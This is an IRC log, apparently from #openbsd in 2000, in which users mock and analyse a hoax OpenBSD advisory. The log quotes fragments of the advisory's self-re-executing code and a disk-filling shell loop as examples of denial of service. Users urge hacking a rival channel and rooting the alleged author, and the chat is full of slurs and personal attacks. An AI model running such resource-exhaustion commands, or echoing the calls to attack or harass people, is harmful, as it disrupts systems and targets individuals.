AAALIIIIVEEE) *** OBSDCMNT : ke4p n0te of th1z guy hez supr l4me *** <laggn> DesertFox : exploit using ddb <rys> regarding that sploit on packetstorm, obviously the author doesn't know what a "local root exploit" is <DesertFox> hmm...the advisory insults openbsd, and says NT and Linux are better. <rys> a local root exploit is not the ability to "crash the kernel" \xf9\xed\xf9 SignOff m3th: #OpenBSD (Read error 73: Connection reset by peer) <rys> christ i could do that with a fork bomb *** OBSDCMNT : u k0uld r00t obsd w/ a f0rkb0mb ? *** \xf9\xed\xf9 dew_freak [~dewfreak@ws037.bt.reshall.wwu.edu] has joined #openbsd <laggn> ...rloxley..is that supposed to be robin loxley as in robin hood? <DesertFox> rys: perhaps the advsory is fake? \xf9\xed\xf9 SignOff binfalse: #OpenBSD (Ping timeout: 180 seconds) <DesertFox> rys: otherwise the author likes to bs everything. <rys> the author says that after crashing you can use ddb to debug and gain access <laggn> DesertFox : im having a hard time finding it on the athor's site..do you have a url? \xf9\xed\xf9 SignOff [rew]: #OpenBSD (irc^BN^B 7.24 + 7.0 for mIRC (2000/03/17 22.00)) <rys> which is dumb because the system won't drop to ddb unless you have it setup to do so <rys> plus, if you have physical access to the box you can boot -s <rys> and then change the root password.. <DesertFox> laggn: didn't see a url... <rys> so.. <laggn> DesertFox : they list themselves as coming from hackphreak.org but there is nothing on that site <DesertFox> rys: you have to HAVE physical access to use ddb right? <DesertFox> laggn: perhaps the advisory is a hoax? <rys> DesertFox: after a kernel crash, i do believe so, unless we're talking about the sparc version and you have a remote console via a console server <DesertFox> rys: never seen a sparc, never used a spark... <DesertFox> oops, "sparc" \xf9\xed\xf9 nikhouri [nikhouri@hyrule.student.syr.edu] has joined #openbsd <rys> sparcs have the ability to use a com port as console instead of a monitor/keyboard <laggn> DesertFox : i don't know..i mean, they don't have anything on their site (it reads like a corp. brochure), and whats the difference between this and booting -s? <DesertFox> laggn: um...it requires crashing the kernel? \xf9\xed\xf9 SignOff dhartmei: #OpenBSD (Read error: 54 (Connection reset by peer)) <rys> laggn: probably nothing.. the advisory mentions that you'll need to have physical access..which is quite lame. <DesertFox> therefore, this advisory is... \xf9\xed\xf9 dhartmei [~dhartmei@cable-ggar48-183.intergga.ch] has joined #openbsd <DesertFox> pretty much harmless <~el81> Doesn't seem harmless if any user can crash my OpenBSD though, damnit <laggn> DesertFox : i guess the code needs to be tested and we'll find out its validity (regardless of how convoluted it is) <dhartmei> well, it crashes 2.7 release :) <rys> ~el81: any user can crash your openbsd.. fork bomb baby \xf9\xed\xf9 mode/#openbsd [+o dhartmei] by Ambrose <the_gh0st> rys: true, but setting proccess limits could prevent that. a user can crash any os that way anyhow heh <~el81> What about fork bomb protection? <opcode> spuug: kdb? <DesertFox> dhartmei: what about 2.8? <dhartmei> don't have a -current system ready to test <~el82> it crashed my 2.6 box.... <rys> ~el81: try setting a ulimit <~el81> Yeah I tested on all of my OpenBSD & one NetBSD, crashed them \xf9\xed\xf9 SignOff pent: #OpenBSD (ircII EPIC4-0.9.1 -- Accept no limitations)<rys> i'm looking at the code right now.. <rys> it's small enough to figure out *** OBSDCMNT : th1s guy k4nt figure it 0ut h4h4 watch u'll s33 *** <laggn> man, how could they even mention NT? and are they mentioning linux to cover their bases? <dhartmei> they call it a remote exploit: "log in to the remote host, download exploit, run it", lol \xf9\xed\xf9 SignOff nikhouri: #OpenBSD (^BBitchX^B: the choice of a GNU generation) <DesertFox> this advisory is just really, really funny. <rys> uhm <rys> it's a fork bomb \xf9\xed\xf9 nikhouri [nikhouri@hyrule.student.syr.edu] has joined #openbsd <rys> fd = open(argv[0], O_RDONLY) <~el82> how is a security hole "funny" <rys> fstat(fd) <rys> (get the file name) <rys> write it to a file <dhartmei> and a reference to obecian :) <rys> then execute that file <rys> well write it's own name to a file <rys> then execute it <rys> so it's just a bloat program <rys> see the execlp at the end? *** OBSDCMNT : execlp() fork() bomb? h4m! *** <~el81> It's just a fork bomb? Doesn't say so in the adv, and doesn't seem to be <rys> read the code <~el81> I did, I don't see fork() in there <rys> all it does is stat itself for it's own name <rys> well okay it doesn't fork <spuug> I'd like to see a pipe(2)bomb. <rys> but imagine a program execing itself over and over again *** OBSDCMNT : eye'm im4g1n1ng 1t, d0eznt se4m 2 b s0 b4d *** <laggn> hrm, its dinner time, and i am glad that the advisory is just an advertisement for themselves <dhartmei> yes, the comments are just utter BS :) <laggn> nite all and thanks for pointing me in te right direction rys <rys> laggn: np <DesertFox> ~el82: no, the way it's written, i'm not say the exploit is funny. \xf9\xed\xf9 SignOff laggn: #OpenBSD (take care :)) <~el81> My boxes all have dropped into ddb <rys> ~el81: but to access ddb you need to have physical access to the boxes <~el81> Yes I know <~el81> But it's still crashing my damn box <rys> in which case you could boot -s anyways <rys> set a process and memory limit per user <rwxr--r--> resource killer = forkbomb == lame *** OBSDCMNT : SIL FROM ANTIOFFLINE == L4M3! BW4H4H *** <~el81> This is synonomous to that old arp cache DoS <rwxr--r--> you could cat file >> file and do the same *** OBSDCMNT : sure u k0uld p4l *** <~el81> Hm, damn, I guess I'll just set limits then <~el82> this still crashes all my openbsd boxes... when can i see a fix? <rwxr--r--> just will waste the machine's resources and eventually cause a crash ;\ <rys> 744: would probably take longer though *** OBSDCMNT : h4kr b0nd1ng at 1tz b3st .. "744" *** <~el81> and run that forkbomb protector lkm \xf9\xed\xf9 SignOff hydro__: #OpenBSD (Idle time limit exceeded) <rwxr--r--> rys true ;) i didnt see the original beginning of this thread <rys> ~el82: set process and memory limits per user <rys> 744: http://packetstorm.securify.com/0011-exploits/hp2.adv <rys> fake advisory *** OBSDCMNT : F$KE?! *** <rwxr--r--> but from what i do see this is a forkbomb junky script kiddiot rootard script *** OBSDCMNT : ur a m0r0n, *PAL* *** \xda\xc4\xc4\xc4\xc4\xc4---\xc4--\xc4\xc4-\xc4\xc4\xc4\xc4\xc4\xc4---\xc4--\xc4\xc4-\xc4\xc4\xc4\xc4\xc4\xc4\xc4\xc4\xc4--- -- - | rys (rys@supernal.godsey.net) (Internic Network) \xb3 ircname : Joe | channels : #openbsd #Icons_of_Vanity \xb3 server : irc.west.gblx.net (Global Crossing West Client Server) : idle : 0 hours 0 mins 12 secs (signon: Sun Nov 5 11:54:14 2000) *** OBSDCMNT : m4ybe he sh0uld b in #ic0nz_of_stup1dity *** <rwxr--r--> bbias will check it now \xf9\xed\xf9 tequiare [condor@feather.net] has joined #openbsd <rwxr--r--> rys^B:^B its a stupid lame 0-day forkbomb *** OBSDCMNT : 0d4y f0rkb0mb ? wh4t sc3n3 do u bel0ng 2 br0?! *** <rys> 744: well it doesn't really fork but yeah your right <rwxr--r--> and i still see what this has to do with openbsd <rwxr--r--> rys^B:^B resrouce killer <rys> 744: seems to be a n advertisment for them <dhartmei> the only original thing about it is the description <DesertFox> yes... <rwxr--r--> i should download it to my openbox and tinker with it but it was written really lame *** OBSDCMNT : du0d ur a fukn idi0t *** <rys> yeah hehe <DesertFox> too much bs? <rwxr--r--> and i dont have time ... besides they put down obecian in it and he's cool as shit so fsck them <DesertFox> well, yes, that too. <DesertFox> :_ <DesertFox> oops, :) <DesertFox> heh <rwxr--r--> theres little intellect in doing that code since you could code a perl script to open up a shitload of resources and do the same *** OBSDCMNT : u #openbsd k0q sukrz r quik to the dr4w, det4ilz bub *** <rwxr--r--> without writting all kinds of funky shit in a so calle dadvisory <~el82> why doesnt obsd have these ulimits by default? <rwxr--r--> i should go pimpslap rloxley *** OBSDCMNT : rl0xley w0uld kiq ur fukn a$$ bytch *** <rwxr--r--> ~el82^B:^B i didnt write open so i dont know <~el81> Holdon guys, something is bothering me <DesertFox> where do you edit the settings? <~el81> How could re execve()'n over and over crash your box in 1 microsecond? <opcode> haha he tells obecian "to hell with you" specifically.. <rwxr--r--> but that advisory was half assed as shit... and to quote from the author MY GRANDMOTHER couldve done better <~el81> And it doesn't even use fork <rys> why would you set ulimits <rys> i don't want my x session ending every time i run netscape \xf9\xed\xf9 ~el83 [~el83@~el83.net] has joined #openbsd <rwxr--r--> anyways... for those sysadmins/sec engineers/fw people I threw up a quickie primer for hardware on stopping/slowing down dos attacks <dhartmei> the only interesting line is "ehdr->a_data += 3;", what's that for? *** OBSDCMNT : w1ll he succeed?!?!!? *** <rys> see struct exec <rwxr--r--> if anyone is interested its at www.antioffline.com/stoppingdos.php3 along with all my other crap <bugoid> where did you get those beeyootiful pictures? <ratcorpse> rys> 744: http://packetstorm.securify.com/0011-exploits/hp2.adv <ratcorpse> <rys> fake advisory <ratcorpse> <rwxr--r--> but from what i do see this is a forkbomb junky script kiddiot <ratcorpse> rootard script <~el81> Hey, you're that antioffline guy? good work :) <ratcorpse> dude <ratcorpse> 1-rloxley is a retard <ratcorpse> 2-he cant even fucking spell <rys> hehe <ratcorpse> and its so disgusting that he mentions SSG <rwxr--r--> if ( (fd = open("/dev/zero", O_RWDR)) == -0) <ratcorpse> Credits : www.hackphreak.org, zsh.interniq.org, www.subterrain.net | <ratcorpse> oh my god man <ratcorpse> he even mentioned US <rwxr--r--> print "\nHi 3y3 4m rl0xl3y f34r my scr1pt\n"; *** OBSDCMNT : y0u d0nteven kn0w C k1d *** <ratcorpse> this is hilarious <ratcorpse> ;] <ratcorpse> man i feel like puking now <dhartmei> exec.a_data /* initialized data size */, why increase it? *** OBSDCMNT : he w0nt get it, sory to sp0il the fun *** <ratcorpse> the last thing i want to see is my group written in the same line with hackphreak losers <ratcorpse> god damnit <dhartmei> to consume more resources? <rys> possibly, proably just code bloat <opcode> www.sneakerz.org/~rat ? <rwxr--r--> ratcorpse... sinnerz? <rwxr--r--> as in coda hale's sinnerz? <ratcorpse> nah <ratcorpse> zsh <ratcorpse> opcode: yes <rwxr--r--> ahh thought it was frmo the old sinnerz.com crew <ratcorpse> sinnerz is a non-technical channel tho <opcode> ZSH (soon) ? hah <ratcorpse> nah <rwxr--r--> damn my typos suck <ratcorpse> zsh is ded <ratcorpse> its now lowlevel.interniq.org <ratcorpse> dead <ratcorpse> man rloxley is soo gay <kajar> kicks sil <ratcorpse> i cant believ he wrote crap like this and used ppls names to rant <rwxr--r--> sup raj :) <kajar> just woke up ;) crazy night last night \xf9\xed\xf9 SignOff marc-: #OpenBSD (Read error 73: Connection reset by peer) \xf9\xed\xf9 marc- [marc@h24-65-26-78.gv.shawcable.net] has joined #openbsd <rwxr--r--> hehe shit i didnt go to sleep till it was 7am EST <rwxr--r--> and woke up at 9am EST =[ hehehe \xf9\xed\xf9 hydro__ [hydro@9mm.com] has joined #openbsd <ratcorpse> AHHAHAH \xf9\xed\xf9 rwxr--r-- is now known as n1nor_ <ratcorpse> man <ratcorpse> thsi shits hilarious \xf9\xed\xf9 mode/#openbsd [+o hydro__] by dhartmei <ratcorpse> man oh man \xf9\xed\xf9 n1nor_ is now known as slutpuppy <rys> haha <rys> it only took em a few moments to notice there was an execlp at the bottom *** OBSDCMNT : y4h du0d m0st people m1ss th4t *** <ratcorpse> dude <rys> and the funny part is at the top..#define CRASH_FILE "./f0rKb0mB" *** OBSDCMNT : d1d we fo0l u fatboy? *** <ratcorpse> that guy is a fucking moron <rys> hahah <ratcorpse> i cant believe he even put caddis and obecian <slutpuppy> pfffttt what a fucknut <ratcorpse> no shit <ratcorpse> ZSH soon <ratcorpse> HAHAHHAH <ratcorpse> yah shuuure we need some 50 year old 800 lbs morons to code warez with us ;] \xf9\xed\xf9 mbhochha [~mbhochha@worm.student.syr.edu] has joined #openbsd <dhartmei> i like the explanation of why this is a _remote_ exploit best <DesertFox> should we chagne the topic to this? *** OBSDCMNT : eye w1sh u w0uld *** <opcode> dhartmei: yes me too.. it all makes so much sense after his 3 point explanation.. <ratcorpse> Theo de Raadt and the OpenBSD Team <ratcorpse> Paedophiles <ratcorpse> Rascists <ratcorpse> dude <ratcorpse> see what a fuckign moron he is ,, he cant even spell 'racist' correct <DesertFox> maybe it's because he can't hack OpenBSD! <ratcorpse> dude <ratcorpse> he cant even root his own box <DesertFox> haha <ratcorpse> he knows 0 <rys> hehe i bet he can <rys> boot -s <DesertFox> i'm still learning... <ratcorpse> hes a 50 somehting year old 800 lbs guy <ratcorpse> i saw him at defcon <~el81> Haha, yeh topic'n this dumb adv would be funny, like dissing the morons who wrote the adv <rys> ratcorpse: are you serious? <DesertFox> that's very scary... <DesertFox> especially the fact that a 50 year old wrote this... <opcode> Assume the location of the box which crashed (@ the colo) ? <opcode> is he suggesting you break & enter? <ratcorpse> rys: i swear to god man <dhartmei> if you look at the typos in the comments, it looks like the author is german, and there were peoples that complained here and on the mailinglists that they were not 'properly informed' about the patches. *** OBSDCMNT : d4mn, wh0 fukn c4rez? *** <ratcorpse> he even has some pics public <ratcorpse> i can understand why he talks shit to zsh but i have no idea why he talks shit to obecian <DesertFox> move off the advisory for a second, i'm wondering if you have denied access to finger, how do you make it show another filek, instead of "Connection Refused" <ratcorpse> like <ratcorpse> hes old enuff to be obecians grandfather and obecians left nut has more skill than 100 ppl like him <DesertFox> obecian seems like a very nice person. <DesertFox> i've talked with him a few times. \xf9\xed\xf9 pent [dschwarz@house.beats.org] has joined #openbsd <spuug> It must be the fog in Ocean Beach. \xf9\xed\xf9 datawar [~dw@esefin1.essex.ac.uk] has joined #openbsd \xf9\xed\xf9 SignOff gaurdian: #OpenBSD (Ping timeout: no data for 246 seconds) <ratcorpse> packetstorm is gay for letting him submit this shit *** OBSDCMNT : y0u are g4y *** <slutpuppy> or echo "i am leet" > /tmp/file <DesertFox> wait, how do you make it dislpay a text file? <ratcorpse> ;] <slutpuppy> finger stream tcp nowait root cat /tmp/file <DesertFox> okay. <DesertFox> thanks \xf9\xed\xf9 nikhouri [nikhouri@hyrule.student.syr.edu] has left #OpenBSD [] <~el81> Damn, I set limits etc, and it still crashs my OpenBSD's <~el81> bbl <ratcorpse> <jimjones> how can you greet SSG and say fuck you to obecian <ratcorpse> HAHAHH <slutpuppy> hahahahahahahahahahahahahaha <slutpuppy> http://www.attrition.org/mirror/attrition/2000/04/16/www.i-need-help.com/ <--- rloxley the hacker <slutpuppy> pfft script kiddiot <john> sigh. <rys> john you been watching? <rys> hehe <john> No. \xf9\xed\xf9 mode/#openbsd [+m] by john <john> woo. \xf9\xed\xf9 mode/#openbsd [+o kahl] by john <toor> john <toor> bend over dude \xf9\xed\xf9 mbhochha [~mbhochha@worm.student.syr.edu] has joined #openbsd <john> ;9 <toor> i have a hard something to shove up in your gaping orifice \xf9\xed\xf9 mode/#openbsd [-m] by john <john> n0 thx! <toor> plz :( <toor> its not like 90% of #OpenBSD hasn't been there :P <toor> brb ;) <rys> john you seen the fake advisory on packetstorm? *** OBSDCMNT : F4KE?! *** <john> No. <john> URL? <rys> http://packetstorm.securify.com <rys> top right column (hp2.adv) <rys> it's a resource eater *** OBSDCMNT : UR N0T 2 SM4RT *** <john> That mouseover shit is lame. <ratcorpse> ddue its so gay <ratcorpse> packetstorm releases anythig u send <ratcorpse> w/o checking <rys> hehe i released something on the original packetstorm and the guy posted it <rys> lame perl script.. he even thanked me.. <rys> then antionline killed it <ratcorpse> the funniest part his where he greets ssg and says fuck you to obecian <rys> heh <ratcorpse> hahahh <ratcorpse> rloxgay is tryint to rant on our name <ratcorpse> and slander us <ratcorpse> ;thanks for zsh for the scripts' heh *** OBSDCMNT : AREN'T Y0U ALRE4DY SL4ND3RD?! *** <slutpuppy> welp... mickeysoft was owned again it seems <slutpuppy> hehehe http://www.infoworld.com/articles/hn/xml/00/11/03/001103hnhacker.xml <john> What the hell is the deal? \xf9\xed\xf9 nosaj [jason@codemonkey.net] has joined #openbsd <john> haha. <john> 4: NO ADVERTISING IN THE CHANNEL OR IT'\x92S TITLE BAR. \xf0 john/#OpenBSD sends grammar.clue -> hackphreak.org <slutpuppy> sorry john <slutpuppy> doh i thought you mant me for posting that url <john> Well. <john> You fuckers can't put a sentence together either. <rys> haha <mogambo> heh \xf9\xed\xf9 SignOff xdm: #Phrack (Ping timeout: 180 seconds) \xf9\xed\xf9 shinobi [shinobi@naughty.monkey.org] has joined #openbsd <ratcorpse> john did you seee the fake advisory <ratcorpse> man i dont know what this retard is trying to do <john> What's fake about it? <rys> it claims to be a remote exploit <ratcorpse> look at the code man <rys> it's just a resource eater <ratcorpse> if you look at the crap he wrote in the beginning ull see its fake <ratcorpse> before you even see the code <dhartmei> read the explanation of why it's supposed to be a remote exploit :) <ratcorpse> SG helped during the researching of the bug (bind, aempire, cripto).<ratcorpse> I would like to thank RootShellHackers and Team ZSH for rigorously testing on many freenets :] (ratcorpse and her great mass testing <ratcorpse> scripts, great for analysis: www.sneakerz.org/~rat < great site :) <ratcorpse> lies <ratcorpse> he put us and gay deface kids together in the same sentence <ratcorpse> he even put solar designer <ratcorpse> and i never coded a mass resolution script <ratcorpse> its jim's script <ratcorpse> haaahah *** OBSDCMNT : at th1s point im gonna st0p doing commentz *** \xf9\xed\xf9 SignOff mbhochha: #OpenBSD (Ping timeout: 180 seconds) <ratcorpse> that idiot is just senile <dhartmei> so, packetstorm publishes any submission without checking it at all? so much for that. <ratcorpse> Basically, if the (sz & (PAGE_SIZE-1)) is true, the kernel <mmap`> I was wondering <ratcorpse> panic()'s. Not so cool Mr. Theo, my grandmother wouldn't even have <ratcorpse> done something so stupid and all she has is an A+ and CCNA! <mmap`> how come bind9 coredumps in a chroot <ratcorpse> thsis is hilarious man <mmap`> like chroot /home/dns /bin/named -u -g, it runs, 4 secs after, it coredumps. <mmap`> heh <john> du0d. <rys> mmap: opcode is looking at the same thing <~el81> i looked into the technicalities of the bug and rloxley is DEAD on <~el81> When can I expect a patch? <mmap`> I think the problem is the new thread implementation <rys> ~el81: christ, for the 10th time, set ulimits <mmap`> if i run the chroot as root user, it doesnt break <~el81> I mean, my servers will go down in a heartbeat. <~el81> How can I fucking set limits on a kernel bug? Jesus <mmap`> uh? <mmap`> the fuck is wrong? <rys> ~el81: it's not a kernel bug, set process limits per user and it'll log your user out before the program can fork bomb <rys> unless, that is, if you're root. <~el81> For god sakes man, it's not a fork bomb, I've looked at the code. I see no fork() <mmap`> it could be a loop <rys> are you fucking retarded.. read the code. it executes itself until it users up all availible memory <rys> mmap: packetstorm.securify.com openbsd "advisory" on the top <rys> it's fake <~el81> If you had an ounce of clue, I would continue talking to you <mmap`> uh <~el81> Where is John, he himself even said it is not fake <mmap`> ~el81, g0 tr4d3 w4r3z, wh3r3z y3r c0ur13r <mmap`> ?! <rys> ~el81: i do have a clue. do you even know c/c++ <~el81> I'm being serious, sorry I'm being angry <mmap`> rys, where it is? <~el81> rys, sorry just calm down <mmap`> give me link \xf9\xed\xf9 [4mat] [k5@dialin-12-212.montreal.primus.ca] has joined #openbsd <john> * Log into the remote host <[4mat]> can anyone help me install OpenBSD, man this is getting on my nerves ..<john> haha. <john> * Log into the remote host <mmap`> 4mat, read docs \xf9\xed\xf9 tashie [~natasha@nic-25-c112-244.mn.mediaone.net] has joined #openbsd <dhartmei> nice, eh? <john> * Grab our exploit <john> ... <tashie> Evenin all. <rys> http://packetstorm.securify.com/0011-exploits/hp2.adv <[4mat]> mmap` from ? <john> Three years without a remote hole? Strike that. <mmap`> www.openbsd.org/faq <[4mat]> shit <dhartmei> wonder what a local hole is, compared to that ;> <[4mat]> i switched to open bsd cause no exploit <[4mat]> that's mad ghey <mmap`> we are not msnhelp, read it, if you got a non documented question, we will help. <[4mat]> just got rooted yesterday <rys> it's not an exploit <rys> i wish someone would explain the code, it's just a resource eater <slutpuppy> rys i dont know why your bothering with these rootards <rys> slutpuppy: i wonder myself. <tashie> I was lookin for someone named cakespoon or something like that <tashie> he invited me to kinda join <tashie> is he still here? <slutpuppy> int ptr* /* er3et codinh */ <tashie> w/a different nick? <tashie> sorry to bother ya'll <slutpuppy> if (Fork() == 0) { <slutpuppy> ... <slutpuppy> } <slutpuppy> ... <dhartmei> rys: i now understand it pretty well, it's pretty much the same as a "execlp(argv[0], 0);" <slutpuppy> printf "\n 3y3 y4m rl0xl3y\n"; <rys> dhartmei: yeah that's about it \xf9\xed\xf9 SignOff ar: #OpenBSD (Hmmm. EPIC4-0.9.10-SSL has another bug. Go figure...) <rys> he just bloated it <tashie> Ok I tried... if u know him... thanks \xf9\xed\xf9 tashie [~natasha@nic-25-c112-244.mn.mediaone.net] has left #openbsd [] <dhartmei> which i would call a fork bomp even though it's not using fork(), even the author used the term 'f0rk' <ratcorpse> i think its not rloxgay who wrote this shit <rys> hmmm my front door is wedged open <ratcorpse> its someone else who tried to fuck with us, ssg, teso and rloxgay <ratcorpse> ;] <rys> (apartment complex).. guess i don't have to log out after all <mmap`> rys, lol that code is mad newbie <rys> mmap`: no shit.. it's just funny that it got posted to packetstorm \xf9\xed\xf9 ~el83 [~el83@~el83.net] has left #openbsd [] <rys> it's even funnier that there are still clubies in here that are asking when we're going to have a patch <mmap`> ya <mmap`> lol <dhartmei> i'm beginning to think their trolls \xf9\xed\xf9 mortay [rifug@rifug.org] has joined #openbsd <dhartmei> they're, even <mortay> anyone play red alert 2 online here? <mmap`> forkbomb doesnt mean the fork() function is being used, it means something is taking up resources <mmap`> send me red alert and ill be glad to play. <mortay> mmap`^B:^B hmm, its two cd's <ratcorpse> rys: packetstorm is retarded and they dot check codes. they just look at the name <mmap`> mortay, ic. <ratcorpse> u can defeat fork bombs in solaris <ratcorpse> i dont know know about obsd <mortay> can i <ratcorpse> u can limit stuff in /etc/system <mmap`> another thing that makes me laff <mmap`> is the lame faqs on security focus <ratcorpse> yah no shit <mmap`> they have like part I, then part II is the same as part I \xf9\xed\xf9 mode/#openbsd [+m] by john <john> Anyone mind? \xf9\xed\xf9 mode/#openbsd [+oo shinobi nosaj] by john \xf9\xed\xf9 mortay [rifug@rifug.org] has left #openbsd [] \xf9\xed\xf9 mode/#openbsd [+o jethro] by john \xf9\xed\xf9 SignOff dew_freak: #OpenBSD (Dead socket) \xf9\xed\xf9 fatal [~gem@193.10.185.3] has joined #openbsd \xf9\xed\xf9 SignOff batz_: #Phrack (Idle time limit exceeded) <john> Wendy's is looking good. <john> Be right back. :) <john> http://www.makintosh.com/~john/Misc/rloxley.txt <dhartmei> john: grammer? lol <john> I know. <john> "it's" <john> heh. <~el82> theo, anyone: when can i expect a patch for the attack described in the 'hackphreak advisory' <dhartmei> re packetstorm: "Thanks for the mail! I really should have read it much more carefully, it was added in a hurry. -Alan", and gone it is :) <rys> obecian: hey you seen the advisory? <rys> heh mmap`.. packetstorm removed the advisory <mmap`> haha <mmap`> lol <mmap`> about time.. <rys> i had it bokmarked.. it's gone <rys> mmap: hey http://www.hackphreak.org/admin/ if you ever want to hack their channel <rys> ratcorpse: heh trying to get a copy of the "advisory" from undernet <rys> haha <ratcorpse> they rm'ed it from packetstorm <mmap`> haha <ratcorpse> cauzsei i found ho wrote it <ratcorpse> he denied it <ratcorpse> and it was gone with jet speed <mmap`> who wrote it. <ratcorpse> http://sneakerz.org/~rat/hp2.adv <ratcorpse> rash akd m1x of security.is <ratcorpse> security.is guys are very upset about it <john> ratcorpse, quit. <john> I've heard enough of that shit. <mmap`> lol <ratcorpse> we suspect some other ppl but hat guy is the one who wrote it most likely since the article is 'gonew' right afteer everyone yelled at him ;] <rys> ratcorpse: haha <ratcorpse> john: ok <mmap`> echo penis > penis ; while (true) ; do cat penis >> penis ; done is also forkbomb <mmap`> its lame. <john> From: rloxley <rloxley@HACKPHREAK.ORG> <john> Subject: OpenBSD Exploit <john> toor^B:^B BUGTRAQ@SECURITYFOCUS.COM <john> moron. <no_pants> john: what's happening? bogus bug ? <john> hahaahah. <john> A very smart attacker will: <john> <john> * Crash the kernel <john> * Assume the location of the box which crashed (@ the colo) <john> * Use DDB to gain god status <mmap`> john, HAHAHA <zothorn> john: yeah, i read that. But a real smart hacker will somehow remove log entries so he doesn't get arrested <aKt0r> HEH <aKt0r> new openbsd hole released <whoops> "hole" <aKt0r> potential remote exploit <whoops> more like local DoS. <aKt0r> by the looks of it yeh <aKt0r> a very sarcastic advisory towards the openbsd guys <whoops> indeed. <whoops> all it does is provoke a panic, though. \xf9\xed\xf9 niles [milford@snow.cs.siue.edu] has joined #openbsd <no_pants> so <no_pants> they wanted a panic <no_pants> now they got it <aKt0r> have u tested it ? <whoops> Yeah. The box panic'ed and booted. <whoops> as expected. <freite> 'Once the system has crashed, a local user (with access to the terminal) may in fact hack the system.' <--- ummm <no_pants> hahahah <no_pants> console access <no_pants> can't you mark console as insecure ? \xf9\xed\xf9 rewben [~rewben@d141214.dtk.chello.nl] has joined #openbsd <ratcorpse> aKt0r: its gone <freite> well..you have access to the kernel debuger <whoops> that is, _if_ the kernel is compiled to drop into DDB on panic. <no_pants> what's DDB ? \xf9\xed\xf9 kkenn [kris@citusc17.usc.edu] has joined #openbsd <whoops> debugger <ratcorpse> its some idiot kid who was pissed at zsh, ssg , teso and obsd alltogether <ratcorpse> hmm <ratcorpse> btw <freite> i have ddb.panic=0 <kkenn> NEWSFLASH! You can root an openbsd box if you have access to the serial console and it's got DDB in the kernel! :-) <ratcorpse> is there anything like solaris /etc/system in obsd that u can tune stuff with? <zb^3> i'm on thier channel <zb^3> we're trying to find out how you telnet into DDB on OpenBSD <zb^3> :) <genecyst> wow, #hackphreak is amazingly lame <whoops> http://www.realweasel.com/ <whoops> (nice cards :) <kkenn> genecyst: :-) \xf9\xed\xf9 SignOff newsham: #Phrack (zzz) <defile> I can see why, it's got like seven people in the channel <defile> 6 now ;-) <kkenn> <vac_> tomorrow attrition is going to be filled with defaced openbsd sites <whoops> lol <`Athlon> So what there is a big fucking bug in it? <Feanor_> unfortunately realweasel cards are 250$/pop <nosaj> vac_ must be portraying some sarcasm.. he knows better <aKt0r> is openbsd2.7 vuln to it ? <whoops> aKt0r: yes. <genecyst> the funny thing is rloxely used Outlook to mail the advisory <genecyst> talk about security holes... <whoops> this is what I got, btw, after rebooting <whoops> Nov 6 07:48:02 wintermute savecore: reboot after panic: AMAP_B2SLOT: invalid by <whoops> te count <no_pants> uhm <no_pants> get this <no_pants> you don't need realweasel cards <no_pants> some of the new intel 2u rack mount chassis <no_pants> you can set up in the bios to use the serial port instead <Feanor_> no_pants: but that shit is even more expensive <zb^3> yupp <zb^3> we do that \xf9\xed\xf9 SignOff vac_: #Phrack (I'm too lame to make a quit message) <Feanor_> oh that ya...but you can't use a serial port to reboot a misbehaving box <no_pants> feanor: not really <zb^3> i hope we don't get rooted through this 'DDB' thing <no_pants> the intel 2u shit <`Athlon> At lest they cant do that if they dont have acess to the box <zb^3> T ALEPH1 PLZ BE ALLOWING POSTS FROM NORMAL USERZ AND NOT JUST SKRIPT KIDDIEZ K PLZ THNX <Feanor_> aleph's getting lazy ;P) <zb^3> heh \xf0 zb^3/#openbsd jerkcity'd aleph a couple of weeks ago <lumpy_> rloxely seems to think all exploits are remote exploits \xf9\xed\xf9 SignOff kyoorius: #Phrack (Leaving) <ratcorpse> dude <ratcorpse> its not rlox who wrote it <ratcorpse> its some gay kid <ratcorpse> he knows what hes doing, he wrote it to bash ppl but it backfired anyway <no_pants> rloxely is gonna get dos'ed <ratcorpse> it is NOT rloxlyt <ratcorpse> damn <no_pants> i hope someone roots his ass and reports to bugtraq howmuch of a moron it is <genecyst> hah, that would just be lame <ratcorpse> the kid who made it is a .lifeless dork <ratcorpse> i mean <ratcorpse> whatever john will kb me if i keep talking about this shit <ratcorpse> no comment <lumpy_> well, that all makes sense now \xf9\xed\xf9 SignOff rewben: #OpenBSD (gotta go) \xf9\xed\xf9 mindsport [mind@talon.darkshadow.org] has joined #openbsd <zb^3> i'm making a yahoo club for rloxley fans <lumpy_> because the last time ive seen people talking to rloxley <lumpy_> he didnt seem to know very much <aKt0r> somebody might have ripped him off <genecyst> haha \xf0 zb^3/#openbsd forges a post from alpeh1 to bugtraq about the evil ctrl+alt+esc break to DDB sploit on freebsd! <zb^3> fear <aKt0r> lol <aKt0r> did someone dos everyone with the new sploit <aKt0r> ? \xf9\xed\xf9 SignOff cpt: #Phrack (moff moff) <defile> not that I know of <sizaym> indeed <aKt0r> probably coded a quick script \xf9\xed\xf9 bind [bind@subterrain.net] has joined #openbsd <aKt0r> bind heh <seifried> splork time <bind> god. <bind> how rediculous <aKt0r> the new sploit worked fine in a shell script against all the bots :P <bind> dude, you dont know what the fuck you are talking about. <bind> you have been misinformed. <aKt0r> hah \xf9\xed\xf9 SignOff drkspyrit: #Phrack (Read error: 54 (Connection reset by peer)) \xf9\xed\xf9 SignOff Lionel_: #Phrack (Ping timeout: 240 seconds) <seifried> fresh pooh <ratcorpse> * zb^3 forges a post from alpeh1 to bugtraq about the evil ctrl+alt+esc <ratcorpse> break to DDB sploit on freebsd! <Figz> BAHA, everyone read this: <Figz> From: rloxley <rloxley@HACKPHREAK.ORG> <Figz> Subject: OpenBSD Exploit <Figz> To: BUGTRAQ@SECURITYFOCUS.COM <Figz> Man, that group gives OpenBSD-haters a bad name. <zb^3> hehe <zb^3> T FIGZ KAN U SHOW ME HOW TO COMPILE DDB INTO MY KERNEL K PLZ THNX?? <Figz> heh <zb^3> T FIGZ WHAT PORT IS 'DDB' ON IN OPENBSD <zb^3> ???? <Figz> I especially like the bit about it being a "remote hole".. <Figz> You see, just log in remotely, crash the kernel, drive out to the colo, repair all the vm damage from ddb, set euid to 0 in some shell, set the system running again.. <Figz> Hmm, oh yea, "remote hole"! <Ober_> ok made it <Ober_> is there a security mailing list for obsd? <Ober_> I would prefer to remove myself from bugtraq for obvious reasons <code9> today openbsd local dos released from bugtraq <Ober_> heh <Ober_> did not see one <Ober_> :) <freite> is there a patch for the DOS? <Ober_> which dos? <Ober_> I did not see a reference to obsd this morning. <code9> http://www.securityfocus.com/templates/archive.pike?list=1 <code9> openbsd exploit article <Ober_> so what is the exploit. <Ober_> I can not click on the adv file without it wanting to d/l it. :( 